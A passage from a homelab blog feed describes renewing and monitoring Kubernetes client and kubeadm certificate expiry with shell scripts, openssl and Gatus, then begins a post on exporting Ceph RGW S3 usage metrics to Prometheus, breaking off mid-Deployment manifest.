<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ssh myuser@<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CP_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;sudo -p \&#34;\&#34; -S cat </span><span style="color:#e6db74">${</span>ADMIN_FILE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">&lt;&lt;&lt;</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>SUDO_PASS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> &gt; ~/temp/admin.conf
</span></span></code></pre></div><p>It SSH&rsquo;s to one of my CP hosts and runs <code>sudo -p &quot;&quot; -S cat /etc/kubernetes/admin.conf</code>.
The previously requested password read via <code>read</code> is piped into the SSH command&rsquo;s
<code>stdin</code> as a HERESTRING. The <code>-p &quot;&quot;</code> is actually load bearing here. Without it,
sudo will show a prompt for the password, which will end up being redirected
into the temporary file in addition to the <code>admin.conf</code> file&rsquo;s content.
The <code>-S</code> option tells sudo to expect receipt of the password on the command
line.</p>
<p>Another nifty little thing I discovered is <a href="https://mikefarah.gitbook.io/yq/">yq</a>,
basically an equivalent of <a href="https://jqlang.org/">jq</a> but for Yaml files.</p>
<p>I updated my credentials and everything worked again. But the fact that I allowed
the certs to expire bugged me, and I decided to introduce another little script
to regularly check the time to expiry of the kubectl client certs.</p>
<h2 id="monitoring-the-certs">Monitoring the certs</h2>
<p>The main problem with monitoring the cert was that it&rsquo;s a client cert, so there&rsquo;s
no HTTP endpoint I could hit to check it regularly. It is only present on my
command and control machine. So I needed something that runs on the C&amp;C host,
and that I wouldn&rsquo;t forget to check regularly. I ended up writing a small script
which checks the expiration dates and tuck it into my <code>~/.profile</code> so it runs
whenever I log into the machine.</p>
<p>The script looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># 30 days</span>
</span></span><span style="display:flex;"><span>WARNING_DURATION<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;2592000&#34;</span>
</span></span><span style="display:flex;"><span>COLOR_RED<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;\e[0;31m&#39;</span>
</span></span><span style="display:flex;"><span>NO_COLOR<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;\033[0m&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>PROD_CERT<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>pass show k8s/credentials | jq -r .status.clientCertificateData<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>CONFIG_CERT<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>pass show k8s/master-credentials | jq -r .status.clientCertificateData<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> checkExpiry<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  cluster<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>1<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  cert<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>2<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> ! openssl x509 -checkend <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>WARNING_DURATION<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> -noout &gt; /dev/null <span style="color:#f92672">&lt;&lt;&lt;</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>cert<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    local endDate
</span></span><span style="display:flex;"><span>    endDate<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>openssl x509 -enddate -noout <span style="color:#f92672">&lt;&lt;&lt;</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>cert<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | cut -d <span style="color:#e6db74">&#39;=&#39;</span> -f2<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>    printf <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>COLOR_RED<span style="color:#e6db74">}</span><span style="color:#e6db74">The </span><span style="color:#e6db74">${</span>cluster<span style="color:#e6db74">}</span><span style="color:#e6db74"> cluster kubectl cert is about to expire!\nEnd date: %b</span><span style="color:#e6db74">${</span>NO_COLOR<span style="color:#e6db74">}</span><span style="color:#e6db74">\n&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>endDate<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>checkExpiry <span style="color:#e6db74">&#34;production&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PROD_CERT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>checkExpiry <span style="color:#e6db74">&#34;configuration&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CONFIG_CERT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span></code></pre></div><p>I&rsquo;m starting out by fetching the credentials from my <a href="https://www.passwordstore.org/">pass store</a>.
If you want to read more about my kube credential setup and how I changed it so
that the kubectl credentials don&rsquo;t just sit unencrypted on the disk, have a look
at <a href="https://blog.mei-home.net/posts/securing-k8s-credentials/">this post</a>.</p>
<p>I&rsquo;m using the <code>openssl</code> command line tool to do the checking, which already has
the <code>checkend</code> flag to check whether the given certificate is valid for at least
<code>${WARNING_DURATION}</code> more seconds. Quite a useful function, removing the need to
do date arithmetic in bash. If the cert is not valid for at least another 30
days, the script will output a warning in red. 30 days should be enough time for
me to log into the C&amp;C host at least once, even during times like the current
one where I&rsquo;m not working on Homelab projects much.</p>
<p>I&rsquo;m calling the <code>checkExpiry</code> function twice, because I&rsquo;ve got two clusters and
hence two sets of credentials. One is my main cluster running most of my workloads.
The other is intended as a management cluster. It&rsquo;s currently still running in a
VM I only launch when needed, as part of my Tinkerbell experiments. I really need
to get back to those at some point&hellip;</p>
<p>My plan was to just stick the script into my <code>~/.profile</code> file, so the check is
only done once, when I log into the machine. The <code>~/.profile</code> script is only
sourced for a login shell, so it should not be executed when I&rsquo;m just opening a
fresh terminal. But this didn&rsquo;t work out as intended. I&rsquo;m using <a href="https://github.com/tmux/tmux">tmux</a>,
and for some reason, the script was executed whenever I open a new pane or window.</p>
<p>After some searching, I found that tmux runs a login shell for every new pane/window
<a href="https://www.mail-archive.com/tmux-users@lists.sourceforge.net/msg05901.html">by default</a>.
I found the solution for changing that behavior in the <a href="https://wiki.archlinux.org/title/Tmux#Start_a_non-login_shell">Arch Linux wiki</a>.
Following that instruction, I put the following line at the end of my <code>~/.tmux.conf</code>
file:</p>
<pre tabindex="0"><code>set -g default-command &#34;${SHELL}&#34;
</code></pre><p>With that, I&rsquo;d get the following output when the kubectl client cert gets close
to the expiration date:</p>
<pre tabindex="0"><code>The production cluster kubectl cert is about to expire!
End date: Sep 14 11:31:30 2026 GMT
The configuration cluster kubectl cert is about to expire!
End date: May 31 20:29:11 2026 GMT
</code></pre><h2 id="monitoring-kubeadm-certs">Monitoring kubeadm certs</h2>
<p>While looking for instructions on how to renew my kubectl certs, I came upon
<a href="https://kubernetes.io/docs/tasks/administer-cluster/kubeadm/kubeadm-certs/#check-certificate-expiration">this Kubernetes docs page</a>.
It mentions this command for getting the expiration dates of Kubeadm&rsquo;s own certs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubeadm certs check-expiration
</span></span></code></pre></div><p>This command shows all of the certificates kubeadm generates for a cluster,
including the certs for all of the Kubernetes control plane components:</p>
<pre tabindex="0"><code>CERTIFICATE                  EXPIRES                  RESIDUAL TIME   CERTIFICATE AUTHORITY   EXTERNALLY MANAGED
admin.conf                   Sep 14, 2026 11:31 UTC   281d            ca                      no
apiserver                    Sep 14, 2026 10:24 UTC   281d            ca                      no
apiserver-etcd-client        Sep 14, 2026 10:24 UTC   281d            etcd-ca                 no
apiserver-kubelet-client     Sep 14, 2026 10:24 UTC   281d            ca                      no
controller-manager.conf      Sep 14, 2026 10:24 UTC   281d            ca                      no
etcd-healthcheck-client      Sep 14, 2026 10:24 UTC   281d            etcd-ca                 no
etcd-peer                    Sep 14, 2026 10:24 UTC   281d            etcd-ca                 no
etcd-server                  Sep 14, 2026 10:24 UTC   281d            etcd-ca                 no
front-proxy-client           Sep 14, 2026 10:24 UTC   281d            front-proxy-ca          no
scheduler.conf               Sep 14, 2026 10:24 UTC   281d            ca                      no

CERTIFICATE AUTHORITY   EXPIRES                  RESIDUAL TIME   EXTERNALLY MANAGED
ca                      Dec 17, 2033 19:15 UTC   8y              no
etcd-ca                 Dec 17, 2033 19:15 UTC   8y              no
front-proxy-ca          Dec 17, 2033 19:15 UTC   8y              no
</code></pre><p>Thinking back a little bit, I recalled that September 14th was the last time I
ran a cluster update, so those already do a certificate renewal. In theory, that
means I should be fine - I&rsquo;m doing cluster updates frequently enough that I
should never let those certs expire within their 365 day TTL. But I still wanted
to monitor those somehow, just in case.</p>
<p>As some of those are client certs, I couldn&rsquo;t just point my <a href="https://gatus.io/">Gatus</a>
instance at them, like I do for my Let&rsquo;s Encrypt main cert. While looking around,
I came across <a href="https://github.com/enix/x509-certificate-exporter">this Prometheus exporter</a>.
It can launch a DaemonSet on k8s nodes and then watch certificate files (and kube config
files as well) on disk and check their expiration dates. In short, it looked
exactly like what I wanted. But there was a problem, as stated in <a href="https://github.com/enix/x509-certificate-exporter/tree/main/deploy/charts/x509-certificate-exporter#watchfiles-and-inode-change">their docs</a>:</p>
<blockquote>
<p>Be aware that for every file path provided to watchFiles, the exporter container will be given read access to the parent directory. This is how we handle the problem of changing inodes. Metrics will of course be limited to the single targetted path, as the program is told to watch the real path from watchFiles.</p></blockquote>
<p>The full note explains that making the containing directory available is necessary
because when the certs are rotated, the exporter would keep the old file open, as
it wouldn&rsquo;t have a way to know that the file was rotated. This makes sense. But
I find it problematic. The <code>/etc/kubernetes/pki</code> directory on my control plane
nodes looks like this:</p>
<pre tabindex="0"><code>-rw-r--r-- 1 root root 1123 Sep 14 12:26 apiserver-etcd-client.crt
-rw------- 1 root root 1675 Sep 14 12:26 apiserver-etcd-client.key
-rw-r--r-- 1 root root 1176 Sep 14 12:26 apiserver-kubelet-client.crt
-rw------- 1 root root 1675 Sep 14 12:26 apiserver-kubelet-client.key
-rw-r--r-- 1 root root 1314 Sep 14 12:26 apiserver.crt
-rw------- 1 root root 1675 Sep 14 12:26 apiserver.key
-rw-r--r-- 1 root root 1107 May  1  2025 ca.crt
-rw------- 1 root root 1675 May  1  2025 ca.key
drwxr-xr-x 2 root root 4096 May  1  2025 etcd
-rw-r--r-- 1 root root 1123 May  1  2025 front-proxy-ca.crt
-rw------- 1 root root 1679 May  1  2025 front-proxy-ca.key
-rw-r--r-- 1 root root 1119 Sep 14 12:26 front-proxy-client.crt
-rw------- 1 root root 1675 Sep 14 12:26 front-proxy-client.key
-rw------- 1 root root 1679 May  1  2025 sa.key
-rw-r--r-- 1 root root  451 May  1  2025 sa.pub
</code></pre><p>So if I were to tell the exporter to watch all of the <code>.crt</code> files, it would also
necessarily gain read access to the <code>.key</code> files. Which means that I would now
have a program running in my cluster which could read the certificates and private
keys of the main Kubernetes infrastructure in my Homelab. That just does not
sound like a good idea to me.</p>
<p>I wasn&rsquo;t able to come up with a proper solution, so I decided to just monitor
the apiserver certificate and use it as a stand-in for the other cert&rsquo;s expiration
dates. They should all be renewed together during my regular cluster updates,
so just monitoring one of the certs should be good enough. &#x1f91e;</p>
<p>I did not even have to make any changes in Gatus, as it already reports the
expiry dates of all certificates for HTTPS endpoints it monitors. Creating a
Grafana panel was as easy as using this PromQL query:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span>gatus_results_certificate_expiration_seconds{name<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">K8s: API</span>&#34;}
</span></span></code></pre></div><p>It refers to this entry in my Gatus config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;K8s: API&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;K8s&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;https://k8s.example.com:6443/livez&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#e6db74">&#34;GET&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">5m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[STATUS] == 200&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">client</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">insecure</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>One last thing slightly bothering me are the CA certs. Those expire in 8 years,
and I decided to not bother monitoring them. I will leave them un-monitored
to add a bit of potential excitement to future me&rsquo;s life. &#x1f601;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Gathering Metrics from Ceph RGW S3</title>
      <link>https://blog.mei-home.net/posts/ceph-rgw-s3-metrics/</link>
      <pubDate>Fri, 10 Oct 2025 22:32:49 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-rgw-s3-metrics/</guid>
      <description>I set up a Prometheus exporter to gather metrics from Ceph&amp;#39;s S3 RadosGW.</description>
      <content:encoded><![CDATA[<p>Wherein I set up some Prometheus metrics gathering from Ceph&rsquo;s S3 RGW and build
a dashboard to show the data.</p>
<p>I like metrics. And dashboards. And plots. And one of the things I&rsquo;ve been missing
up to now was data from Ceph&rsquo;s <a href="https://docs.ceph.com/en/reef/radosgw/">RadosGateway</a>.
That&rsquo;s the Ceph daemon which provides an S3 (and Swift) compatible API for Ceph
clusters.</p>
<p>While <a href="https://rook.io/">Rook</a>, the tool I&rsquo;m using to deploy Ceph in my k8s cluster,
already wires up Ceph&rsquo;s own exporters to be scraped by a <a href="https://prometheus-operator.dev/">Prometheus Operator</a>,
that does not include S3 data.
My main interest here is the development of bucket sizes over time, so I can see
early when something is misconfigured. Up to now, the only indicator I had was
the size of the pool backing the RadosGW, which currently stands at 1.42 TB, which
makes it the second-largest pool in my cluster.</p>
<p>For providing the data in Prometheus format, I&rsquo;m using <a href="https://github.com/blemmenes/radosgw_usage_exporter">this exporter</a>.
It uses the RadosGW&rsquo;s <a href="https://docs.ceph.com/en/reef/radosgw/admin/#usage">Usage API</a>
to get the data and converts it into Prometheus format.
This data can also requested with <code>radosgw-admin</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>radosgw-admin usage show
</span></span></code></pre></div><p>This shows data for all users and buckets. An example output just for my blog
bucket/user looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;entries&#34;</span>: [
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;user&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;buckets&#34;</span>: [
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bucket&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;time&#34;</span>: <span style="color:#e6db74">&#34;2024-01-21T00:00:00.000000Z&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;epoch&#34;</span>: <span style="color:#ae81ff">1705795200</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;owner&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;categories&#34;</span>: [
</span></span><span style="display:flex;"><span>                        [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                        {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;get_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">2995740956</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">79510</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">79496</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;put_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">61606006</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">869</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">869</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                    ],
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bucket&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;time&#34;</span>: <span style="color:#e6db74">&#34;2025-09-13T21:00:00.000000Z&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;epoch&#34;</span>: <span style="color:#ae81ff">1757797200</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;owner&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;categories&#34;</span>: [
</span></span><span style="display:flex;"><span>                        [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                        {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;get_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">4085435893</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">81549</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">81516</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;put_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">10946996</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">315</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">315</span>
</span></span><span style="display:flex;"><span>                        }
</span></span><span style="display:flex;"><span>                        [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                    ],
</span></span><span style="display:flex;"><span>                }
</span></span><span style="display:flex;"><span>            ]
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;summary&#34;</span>: [
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;user&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;categories&#34;</span>: [
</span></span><span style="display:flex;"><span>                [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;get_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">77373327028</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">1832858</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">1779988</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;put_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">293350218</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">7572</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">7572</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;total&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">77408103266</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">293350218</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">1840790</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">1787784</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;bytes_processed&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;bytes_returned&#34;</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>For this data to be gathered and made available, the option <code>rgw_enable_usage_log = true</code>
needs to be configured in the MON config database or directly in the RGW <code>ceph.conf</code>
file. In my case at least, the option seemed to be enabled by default, but I&rsquo;m
not sure whether I enabled it at some point, or whether it was enabled by Rook.</p>
<p>Next step was building the container image for the exporter, using the Dockerfile
already available <a href="https://github.com/blemmenes/radosgw_usage_exporter/blob/master/Dockerfile">in the repository</a>.</p>
<p>Then came the deployment into my k8s cluster. I based my deployment on the
example files for a Rook Ceph deployment also provided <a href="https://github.com/blemmenes/radosgw_usage_exporter/tree/master/examples/k8s/k8s">in the repository</a>.</p>
<p>First, the Ceph RGW user, so the exporter can access the Usage API:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#ae81ff">buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">bucket</span>: <span style="color:#ae81ff">read</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>: <span style="color:#ae81ff">read</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">usage</span>: <span style="color:#ae81ff">read</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">user</span>: <span style="color:#ae81ff">read</span>
</span></span></code></pre></div><p>Then the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">image</span>: <span style="color:#ae81ff">images.example.com/homelab/rgw-exporter:0.1</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
